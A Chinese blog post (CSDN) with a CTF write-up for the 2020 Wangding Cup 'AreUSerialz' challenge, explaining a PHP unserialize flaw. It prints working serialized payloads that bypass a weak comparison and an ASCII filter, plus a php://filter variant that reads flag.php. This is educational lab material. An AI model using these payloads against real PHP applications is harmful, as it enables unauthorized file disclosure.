[网鼎杯 2020 青龙组]AreUSerialz1详解两种常用方法及php伪协议扩展

已于 2024-01-21 18:36:43 修改
阅读量564 收藏 8
点赞数 7
分类专栏: BUUCTF攻防平台例题 文章标签: php 网络安全 web安全 网络攻击模型 系统安全
于 2024-01-21 11:13:41 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73615178/article/details/135726878
版权

[网鼎杯 2020 青龙组]AreUSerialz1

  • 分析源代码

根据题目代码分析,可知这是一题反序列化类型的题目。

按照常规方法,首先,我们先将代码复制到本地进行序列化构造,

根据代码逻辑分析,咋们可知,没有new对象,所以以下__construct()魔术方法不会触发,直接删除

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

__destruct()析构函数当对象被销毁时会被自动调用;所以当反序列化函数调用时,会触发这个魔术方法;

分析此方法内的代码逻辑,当我们需要它正确输出flag时此魔术方法调用后会接着正确调用此对象中的process()方法和output()方法所以write()方法也可以删除不用看, protected $content属性也可直接删了。

根据删减,主要代码为:

<?
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
    protected $op;
    protected $filename;
    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }
    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }
    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
            $this->process();
    }
}
function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}
if(isset($_GET{'str'})) {
    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }
}

根据上述代码分析,当$op值强比较===不等于str(2),弱比较==等于2。

($this->op === "2")//不等于字符串类型的 2
($this->op == "2") //弱等于2 即可为int(2)

根据构造函数is_valid($s) 可知,

$s的值ASCII码范围得在32<=$s<=125;

再根据构造函数read()可知,

$filename值基本为flag.php

根据上述信息,构造第一个序列化值得到:

O:11:"FileHandler":3:{s:5:"*op";i:2;s:11:"*filename";s:8:"flag.php";s:10:"*content";N;}

根据经验及实验,我们简单构造的序列化值都属于这个ASCII码范围内,但是我们将构造的第一个序列化值get上传发现并不是flag,返回了,

这是一个重要的知识点,因为,代码中$op $filename属性为protected类型的,php中protected和private类型属性在类和对象实例中不可见的。所以这题根据这个特性有两个解题思路。

一:PHP7.1以上版本对 属性类型不敏感,将直接在序列化对象时将属性的类型换成public;

<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler {
    public $op=2;
    public $filename="flag.php";
}
 O:11:"FileHandler":2:{s:2:"op";i:2;s:8:"filename";s:8:"flag.php";
查看源码得:flag{2da81393-7f91-4ef0-ba3d-9d7fc548b957}

二:根据特性

private私有属性序列化时,在变量名前加 %00类名%00(%00 %00 是url编码代表null null)
protected受保护属性序列化,在变量名前加 %00 * %00

但这题使用%00不能正确执行因为%00会被浏览器自动解析成空字符其的ASCII码为0不在if判断的范围内,所以将%00改为\00其也是代表空字符且浏览器不会自动解析。

并且其中字符串类型s大写S时后面的值可以转义ascii的16进制来达到绕过浏览器解析的目的,后端\00即可被解析为ASCII码0代表空字符。

所以payload可为:

O:11:"FileHandler":3:{S:5:"\00*\00op";i:2;S:11:"\00*\00filename";s:8:"flag.php";}

拓展:突破protected访问修饰符限制,在第一种方法的基础上使用伪协议访问。

<?php
include("flag.php");
highlight_file(__FILE__);
class FileHandler
{
    public $op = 2;
    public $filename = "php://filter/read=convert.base64-encode/resource=flag.php";
}
?>
O:11:"FileHandler":2:{s:2:"op";i:2;s:8:"filename";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}

base64解码得<?php $flag='flag{2da81393-7f91-4ef0-ba3d-9d7fc548b957}';

「已注销」
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
网鼎杯2020[青龙]--AreUSerialz
Oavinci的博客
06-28 7025
知识点: PHP反序列化漏洞 弱类型比较 <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp...
2020网鼎杯青龙Boom
05-12
【标题】"2020网鼎杯青龙Boom" 涉及的是一个网络安全竞赛的场景,其中"网鼎杯"是中国国内知名的网络安全技术大赛,旨在提升参赛者的网络安全技能和应急处理能力。"青龙"可能是比赛中的一个分或者阶段,可能...
2020-网鼎杯-青龙-Web-AreUSerialz
feng的博客
11-03 750
前言 是一道PHP反序列胡的题目,不过那个ASCII的绕过就是我们知识盲区了,还有就是路径的问题,不过我是在CTFHub上做的这个题目,不存在路径的问题。 WP 首先进入环境,进行代码审计: <?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; functio
2020网鼎杯青龙赛题.zip
05-10
比赛试题附件,其中包括misc,re,crypto,pwn,这些资源仅供学习参考,禁止用于盈利活动。希望大家可以合理利用,谢谢。
[网鼎杯 2020 青龙]AreUSerialz(超详细)
2201_75955146的博客
10-22 322
一周一更,这是第二周啦,还是一道PHP审计题。学了蛮久了,终于算是懂了一点了。话不多说,直接开始。感觉好难学啊!哎,慢慢来吧,会熬出头的。
[网鼎杯 2020 青龙]AreUSerialz-BUUCTF-XING
最新发布
chinese_cabbage0的博客
02-01 927
此处为=,弱类型比较,op=="2”,结果为true,op==="2",结果为false。//定义了赋初值,如果在这了把filename设置为flag.php和op设置为2就可以看到flag了,但是后面有个。查看代码可以看出来,GET方式传入序列化的str字符串,str字符串中每一个字符的ASCII范围在32到125之间,然后对其反序列化。//把op=2给赋值成了op=1,所以不行。op==="2",将其赋为"1",同时content赋为空,进入process函数。(===是强类型比较)
2020网鼎杯青龙web AreUSerialz详解
永远是少年
12-20 723
今天继续给大家介绍CTF刷题,本文主要内容是2020网鼎杯青龙web AreUSerialz详解。 一、题目简介 二、PHP代码分析 三、解题实战
2022年第三届“网鼎杯网络安全大赛(青龙)部分题目附件
09-19
2022年第三届“网鼎杯网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯网络安全大赛(青龙)部分题目附件 2022年第三届“网鼎杯”网络...
网鼎杯青龙18道.rar
06-11
【标题】"网鼎杯青龙18道.rar"是一个关于网络安全竞赛的资源压缩包,其中包含了2020网鼎杯青龙的比赛题目。网鼎杯是一项知名的网络安全技术竞赛,旨在提升参赛者的网络安全技能和实战能力,尤其针对青龙,...
2020网鼎杯青龙白虎部分试题.rar
05-14
2020网鼎杯青龙白虎部分试题 ,包括密码、杂项、逆向、PWN。希望可以帮助到大家复习。此次青龙难度大于白虎。
[网鼎杯 2020 青龙]AreUSerialz 解题思路&过程
iamblackcat's blog
09-23 5687
buu复现 [网鼎杯 2020 青龙]AreUSerialz 解题思路&过程
[网鼎杯 2020 青龙]AreUSerialz1
陈艺秋的博客
07-05 682
如果 $str 经过 is_valid() 函数的检查,返回 true,则使用 unserialize() 函数对 $str 进行反序列化操作,并将结果赋值给变量 $obj。op,filename,$content三个变量权限都是protected,而protected权限的变量在序列化的时会有%00*%00字符,%00字符的ASCII码为0,就无法通过上面的is_valid函数校验。则将 $op 的值修改为 "1",并清空 $content,然后再次调用 process() 方法
BUUCTF [网鼎杯 2020 青龙]AreUSerialz 1 (两种解法 超详细!)
m0_73734159的博客
11-27 1593
*include() ** 包含函数 ** ****is_valid() ** 检查对象变量是否已经实例化,即实例变量的值是否是个有效的对象。**file_get_contents() ** 函数把整个文件读入一个字符串中。**file_put_contents() **函数把一个字符串写入文件中。
BUUCTF [网鼎杯 2020 青龙]AreUSerialz1
weixin_74410605的博客
08-20 343
得到O:11:"FileHandler":3:{s:2:"op";通过认真看代码及理解代码,根据op=2且filename=flag.php写出相应的反序列化代码构造payload即可得出flag。接着ctrl+u查看源码即可得到flag。
[网鼎杯 2020 青龙]AreUSerialz(BUUCTF)
weixin_53150482的博客
07-17 420
[网鼎杯 2020 青龙]AreUSerialz(BUUCTF)
buuctf-AreUSerialz
m0_62094846的博客
03-24 1516
<?php include("flag.php"); highlight_file(__FILE__); class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content = "He.
2020网鼎杯青龙)--WEB--AreUSerialz(反序列化)
a965527596的博客
05-17 2317
AreUSerialz 1.题目直接给出源码,分析源码发现是反序列漏洞,读代码发现通过get传入参数str,然后会利用is_valid()函数进行检测是否合法,函数限制只能出现ascii值在32-125之间的字符,而protected类型序列化出现的%00标识被url解码后ascii值为0,会被检测到,但是因为php7.1+对类属性的检测不严格,所以可以直接用public来进行序列化。 <?php include("flag.php"); highlight_file(__FILE__);
php 反序列化 性能,PHP反序列化详解
weixin_32818917的博客
03-10 238
首先看一张图PHP反序列化 原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。serialize()//将一个对象转换成一个字符串unserialize()//将字符串还原成一个对象反序列化分为有类和无类我们先来看序列化数...
buuCTF-AreUSerialz_第二届网鼎杯web
Fisher
05-22 699
写在前面: web菜鸟,在做buuctf中的网鼎杯赛题的时候,有去学习了一遍php反序列,加深了理解。 为什么会用到序列化,自己的理解就是当一段代码消失时候,保存的数据也会跟着消失,但时如果要是再去使用这些数据的时候,如果在添加十分的不方便,于是就出现了序列化,将数据保存起来。 关键点: 1.我们想用反序列必须存在 unserialize(),且提交的变量可控。 unserialize():反序列化,将字符串转化为类。 serialize():序列化,将类转化为字符串。 2.可控的值,为class 类中的属
青龙面板有哪些常用操作?
12-16
青龙面板是一款优秀的开源代码,它提供了许多常用的操作,以下是其中一些常用操作的介绍: 1. 添加任务:在面板中添加任务,可以通过手动添加、复制粘贴、导入等方式添加任务。 2. 查看日志:可以查看任务的运行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值